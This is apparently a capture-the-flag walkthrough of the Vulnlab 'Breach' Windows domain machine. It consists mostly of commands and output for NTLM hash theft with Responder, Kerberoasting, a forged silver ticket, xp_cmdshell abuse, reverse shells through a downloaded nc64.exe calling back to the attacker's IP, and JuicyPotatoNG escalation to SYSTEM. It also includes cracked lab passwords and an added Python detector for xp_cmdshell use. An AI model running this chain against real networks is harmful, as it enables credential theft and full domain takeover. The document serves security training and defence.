vulnlab breach
A Medium Windows machine.
Tools used: ntlm_theft.py, impacket-getPac, impacket-GetUserSPNs, ldapdomaindump, impacket-mssqlclient, JuicyPotatoNG.exe
We generate a set of files that coerce an outbound authentication, leading to an NTLMv2 hash capture, using this tool: https://github.com/Greenwolf/ntlm_theft

```
python ntlm_theft.py -g all -s 10.10.97.69 -f puckie
```
```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ sudo responder -I tun0

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b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
[*] Skipping previously captured hash for BREACH\Julia.Wong
```
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
```
hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt
```

As Julia.Wong
Pull the PAC for the administrator account to obtain the domain SID (needed for the silver ticket later):

```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO
LogonTime:
    dwLowDateTime:  2560514102
    dwHighDateTime: 30942228
LogoffTime:
--snip--
Domain SID: S-1-5-21-2330692793-3312915120-706255856
0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
```
Kerberoasting: request a service ticket for the svc_mssql SPN so it can be cracked offline:

```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$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
```
Getting more users
```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

└─$ cat domain_users.grep | grep svc
svc_mssql  svc_mssql  svc_mssql  Domain Users  02/17/22 10:43:07  06/07/24 13:34:45  06/07/24 13:34:45  NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD  02/17/22 10:43:08  S-1-5-21-2330692793-3312915120-706255856-1115

└─$ bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69
```
Silver ticket: create one with the NTLM hash of the svc_mssql user.
A silver ticket requires three things: the domain SID, the service account's NTLM hash, and the service's SPN.
```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c

└─$ impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

└─$ export KRB5CCNAME=administrator.ccache
```
```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)>
```
SQL stuff
```
SQL (BREACH\Administrator dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE
SQL (BREACH\Administrator dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE
SQL (BREACH\Administrator dbo@master)> xp_cmdshell dir "C:\"
output
----------------------------------------------------------
 Volume in drive C has no label.
 Volume Serial Number is B465-02B6
NULL
 Directory of C:\
NULL
08/19/2021  06:24 AM    <DIR>          EFI
02/17/2022  09:55 AM    <DIR>          inetpub
05/08/2021  08:20 AM    <DIR>          PerfLogs
02/17/2022  10:28 AM    <DIR>          Program Files
02/17/2022  10:27 AM    <DIR>          Program Files (x86)
02/17/2022  02:11 PM    <DIR>          share
02/17/2022  01:12 PM    <DIR>          Users
02/17/2022  03:35 PM    <DIR>          Windows
               0 File(s)              0 bytes
               8 Dir(s)  11,722,678,272 bytes free
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output
------
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell dir "C:\Temp"
output
--------------------------------------------------
 Volume in drive C has no label.
 Volume Serial Number is B465-02B6
NULL
 Directory of C:\Temp
NULL
06/07/2024  10:34 AM    <DIR>          .
06/07/2024  10:34 AM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               1 Dir(s)  11,754,811,392 bytes free
NULL
SQL (BREACH\Administrator dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"
```
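The xp_cmdshell step above leaves two traces a defender can collect without extra auditing: the server writes the same "Configuration option ... changed" message to its ERRORLOG, and every xp_cmdshell command runs as cmd.exe with sqlservr.exe as its parent. This is an added example (not from the writeup) that checks both over constructed log records; the sqlservr.exe install path and the timestamps are assumed.

```python
import re

# Constructed SQL Server ERRORLOG excerpt (timestamps and spid made up). The option-change
# text is exactly what mssqlclient echoed from the server in the session above.
ERRORLOG = """\
2024-06-07 10:31:02.11 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-06-07 10:31:05.47 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-06-07 10:40:12.00 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Constructed process-creation records (Sysmon event ID 1 fields). xp_cmdshell runs its
# command line through cmd.exe as a child of sqlservr.exe; the install path is assumed.
PROC_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]

OPTION_RE = re.compile(r"^(\S+ \S+) (spid\d+)\s+Configuration option '([^']+)' changed from (\d) to (\d)\.")
# Server options that hand out code execution or file/network reach once enabled.
WATCHED_OPTIONS = {"xp_cmdshell", "ole automation procedures", "ad hoc distributed queries"}
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def enabled_dangerous_options(errorlog: str):
    """(timestamp, spid, option) for every watched option that was switched on (0 -> 1)."""
    hits = []
    for line in errorlog.splitlines():
        m = OPTION_RE.match(line)
        if m and m.group(3).lower() in WATCHED_OPTIONS and m.group(5) == "1":
            hits.append((m.group(1), m.group(2), m.group(3)))
    return hits


def shells_spawned_by_sql(events):
    """Process-creation records where sqlservr.exe is the parent of a command shell."""
    return [e for e in events
            if e["parent"].lower().endswith("sqlservr.exe")
            and e["image"].lower().endswith(SHELLS)]


if __name__ == "__main__":
    for ts, spid, opt in enabled_dangerous_options(ERRORLOG):
        print(f"{ts} {spid}: '{opt}' enabled")
    for e in shells_spawned_by_sql(PROC_EVENTS):
        print("sqlservr.exe spawned", e["image"], "->", e["cmdline"])
```

The re-disable at 10:40 is deliberately not flagged: the enable event is the alert, and a later 1 -> 0 flip is the cleanup a reviewer wants to see next to it.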
Privesc with JuicyPotatoNG
The shell comes back as svc_mssql, whose token holds SeImpersonatePrivilege (Enabled); that is what JuicyPotatoNG abuses to reach SYSTEM:

```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe
-a----          6/7/2024  10:34 AM          45272 nc64.exe

PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>
```
```
┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC
```